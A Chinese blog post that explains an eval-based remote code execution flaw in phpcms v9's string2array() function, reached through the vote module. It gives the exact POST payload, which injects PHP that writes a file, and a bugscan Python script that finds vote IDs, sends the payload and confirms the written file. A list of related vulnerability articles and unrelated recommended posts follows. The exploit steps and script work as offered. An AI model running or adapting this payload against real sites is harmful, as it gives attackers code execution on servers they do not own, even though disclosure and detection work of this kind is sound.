phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞

/phpsso_server/phpcms/libs/functions/global.func.php

/**

* 将字符串转换为数组

*

* @param    string    $data    字符串

* @return    array    返回数组格式,如果,data为空,则返回空数组

*/

function string2array($data) {

if($data == '''') return array();

eval("\$array = $data;");

return $array;

}

在文件/phpcms/modules/vote/index.php中,我们找到它的执行流程

/**

* 处理投票

*/

public function post(){

$subjectid = intval($_POST[''subjectid'']);

if(!$subjectid)    showmessage(L(''vote_novote''),''blank'');

//当前站点

$siteid = SITEID;

//判断是否已投过票,或者尚未到第二次投票期

$return = $this->check($subjectid);

switch ($return) {

case 0:

  showmessage(L(''vote_voteyes''),"?m=vote&c=index&a=result&subjectid=$subjectid&siteid=$siteid");

  break;

case -1:

  showmessage(L(''vote_voteyes''),"?m=vote&c=index&a=result&subjectid=$subjectid&siteid=$siteid");

  break;

}

if(!is_array($_POST[''radio''])) showmessage(L(''vote_nooption''),''blank'');

    $time = SYS_TIME;

   $data_arr = array();

  foreach($_POST[''radio''] as $radio){  //接收POST传递的radio并转换为$radio数组

  $data_arr[$radio]=''1'';

  }

  $new_data = array2string($data_arr);//转成字符串存入数据库中

  //添加到数据库

$this->vote_data->insert(array(''userid''=>$this->userid,''username''=>$this->username,''subjectid''=>$subjectid,''time''=>$time,''ip''=>$this->ip,''data''=>$new_data));

//把字符串$new_data放到data里面

//查询投票奖励点数,并更新会员点数

$vote_arr = $this->vote->get_one(array(''subjectid''=>$subjectid));

  pc_base::load_app_class(''receipts'',''pay'',0);

receipts::point($vote_arr[''credit''],$this->userid, $this->username, '''',''selfincome'',L(''vote_post_point''));

//更新投票人数

$this->vote->update(array(''votenumber''=>''+=1''),array(''subjectid''=>$subjectid));

showmessage(L(''vote_votesucceed''), "?m=vote&c=index&a=result&subjectid=$subjectid&siteid=$siteid");

}

/**

*

* 投票结果显示

*/

public function result(){

$siteid = SITEID;

$subjectid = abs(intval($_GET[''subjectid'']));

if(!$subjectid)    showmessage(L(''vote_novote''),''blank'');

//取出投票标题

$subject_arr = $this->vote->get_subject($subjectid);

if(!is_array($subject_arr)) showmessage(L(''vote_novote''),''blank'');

extract($subject_arr);

//获取投票选项

$options = $this->vote_option->get_options($subjectid);

//新建一数组用来存新组合数据

        $total = 0;

        $vote_data =array();

$vote_data[''total''] = 0 ;//所有投票选项总数

$vote_data[''votes''] = 0 ;//投票人数

//获取投票结果信息

        $infos = $this->vote_data->select(array(''subjectid''=>$subjectid),''data'');

//循环每个会员的投票记录

foreach($infos as $subjectid_arr) {

extract($subjectid_arr);

$arr = string2array($data);//调用了string2array进入eval函数

foreach($arr as $key => $values){

$vote_data[$key]+=1;

}

$total += array_sum($arr);

$vote_data[''votes'']++ ;

}

$vote_data[''total''] = $total ;

//SEO设置

$SEO = seo(SITEID, '''', $subject, $description, $subject);

   include template(''vote'',''vote_result'');

}

所以执行的过程就是

1.首先找到一个可以投票的id参数subjectid

2.发起投票,post数据

/index.php?m=vote&c=index&a=post&subjectid=xxx&siteid=1

subjectid=1&radio[]=);fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),"vulnerable test");

3.然后我们再查看result,触发string2array函数

/index.php?m=vote&c=index&a=result&subjectid=xxx&siteid=1

4.再看看是否有readme.php文件存在。

附上一个用于bugscan检测脚本

Python

# !/usr/bin/dev python

# -*- coding:utf-8 -*-

import re

import urllib

import urllib2

def get_vote_links(args):

    vul_url = args

    vote_url = ''%sindex.php?m=vote'' % vul_url

    code, head, res, _, _ = curl.curl(vote_url)

    ids = []

    for miter in re.finditer(r''<a href=.*?subjectid=(?P<id>\d+)'', res, re.DOTALL):

        ids.append(miter.group(''id''))

    if len(ids) == 0:

        return None

    return list(set(ids))

def assign(service, args):

    if service == ''phpcms'':

        return True, args

    pass

def audit(args):

    vul_url = args

    ids = get_vote_links(args)

    if ids:

        for i in ids:

            exploit_url = ''%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1'' % (vul_url, i)

            payload = {''subjectid'': 1,

                       ''radio[]'': '');fputs(fopen(base64_decode(YnVnc2Nhbi5waHA=),w),"vulnerable test");''}

            post_data = urllib.urlencode(payload)

            curl.curl(''-d "%s" %s'' % (post_data, exploit_url))

            verify_url = ''%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1'' % (vul_url, i)

            curl.curl(verify_url)

            shell_url = ''%sbugscan.php'' % vul_url

            code, head, res, _, _ = curl.curl(shell_url)

            if code == 200 and ''vulnerable test'' in res:

                security_hole(vul_url)

    pass

if __name__ == "__main__":

    from dummy import *

    audit(assign(''phpcms'', ''http://www.example.com/'')[1])

phpcms前台任意代码执行漏洞(php<5.3)的更多相关文章

  1. Discuz! 6.x/7.x 版本 前台任意代码执行漏洞

    一.漏洞原理: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞. include/global.fun ...

  2. seacms_6.4.5 前台任意代码执行漏洞分析

    环境搭建 1.下载安装包 下载地址: 链接:https://pan.baidu.com/s/1uw_VnxnvG4GGEae4TRsGGw 密码:cd48 2.常规安装 漏洞复现 poc1: http ...

  3. WordPress wp-includes/functions.php脚本远程任意代码执行漏洞

    漏洞名称: WordPress wp-includes/functions.php脚本远程任意代码执行漏洞 CNNVD编号: CNNVD-201309-166 发布时间: 2013-09-13 更新时 ...

  4. php 168任意代码执行漏洞之php的Complex (curly) syntax

    今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php?only=1&showHt ...

  5. 20.Ecshop 2.x/3.x SQL注入/任意代码执行漏洞

    Ecshop 2.x/3.x SQL注入/任意代码执行漏洞 影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二 ...

  6. 记一次海洋cms任意代码执行漏洞拿shell(url一句话)

    实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...

  7. 干货|CVE-2019-11043: PHP-FPM在Nginx特定配置下任意代码执行漏洞分析

    近期,国外安全研究员Andrew Danau,在参加夺旗赛(CTF: Capture the Flag)期间,偶然发现php-fpm组件处理特定请求时存在缺陷:在特定Nginx配置下,特定构造的请求会 ...

  8. 修复Apache Log4j任意代码执行漏洞安全风险通告

    2021年12月10日 0x01漏洞背景 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具.该工具重写了Log4j框架,并且引入了 ...

  9. 漏洞预警 | Apache Struts2 曝任意代码执行漏洞 (S2-045)

    近日,Apache官方发布Apache Struts 2.3.5–2.3.31版本及2.5–2.5.10版本存在远程代码执行漏洞(CNNVD-201703-152 ,CVE-2017-5638)的紧急 ...

随机推荐

  1. OpenCV3.1.0+VS2015开发环境配置

    摘要: 由于最近AR(增强现实)这个概念非常火爆,各种基于AR的应用及游戏逐渐面向大众,而在AR中最重要的两个技术就是跟踪识别和增强渲染,其中跟踪识别是通过OpenCV这个开源的计算机视觉库来实现的, ...

  2. Topcoder SRM 603 div1题解

    昨天刚打了一场codeforces...困死了...不过赶在睡前终于做完了- 话说这好像是我第一次做250-500-1000的标配耶--- Easy(250pts): 题目大意:有一棵树,一共n个节点 ...

  3. java合并两个有序数组的算法(抛砖引玉)

    前几天看见一道面试题中要将两个有序数组合并成一个新的有序数组,首先使用了嵌套循环,之后想那样效率太低,又想出了以下思路,和大家分享下,如果有更好的方法,请留言指教: 思路: 1.新建一个数组大小为fi ...

  4. PSR-2 编码风格规范

    本篇规范是 PSR-1 基本代码规范的继承与扩展. 本规范希望通过制定一系列规范化PHP代码的规则,以减少在浏览不同作者的代码时,因代码风格的不同而造成不便. 当多名程序员在多个项目中合作时,就需要一 ...

  5. C# Quartz 整理

    因项目需要,在C#中使用了定时程序.自然就使用了Quartz了 但是使用的时候,经过一段时间后,发现了两个重大问题,结果导致的是一样的,就是都导致了定时不会继续执行了. 第一个问题是,定时程序发布在I ...

  6. 计蒜客 18492.Upside down primes-米勒拉宾判大素数 (German Collegiate Programming Contest 2015 ACM-ICPC Asia Training League 暑假第一阶段第三场 K)

    K. Upside down primes 传送门 这个题就是把大数按字符串输进去,判断一下是不是素数,然后反转180度,先判断反转之后的东西是不是一个数,如果是的话,再把这个数判一下是不是素数,如果 ...

  7. Educational Codeforces Round 33 (Rated for Div. 2) D. Credit Card

    D. Credit Card time limit per test 2 seconds memory limit per test 256 megabytes input standard inpu ...

  8. poj3693(后缀数组)

    poj3693 题意 给出一个串,求重复次数最多的连续重复子串,输出字典序最小的. 分析 论文 例8(P21). Sparse-Table算法预处理出任意两个后缀串的LCP. code #includ ...

  9. POJ 3686 The Windy's (费用流)

    [题目链接] http://poj.org/problem?id=3686 [题目大意] 每个工厂对于每种玩具的加工时间都是不同的, 并且在加工完一种玩具之后才能加工另一种,现在求加工完每种玩具的平均 ...

  10. [COCI2015]FUNGHI

    题目大意: 一个环上有8个数,从中选取连续的4个数使得和最大,求最大的和. 思路: 模拟. #include<cstdio> #include<cctype> #include ...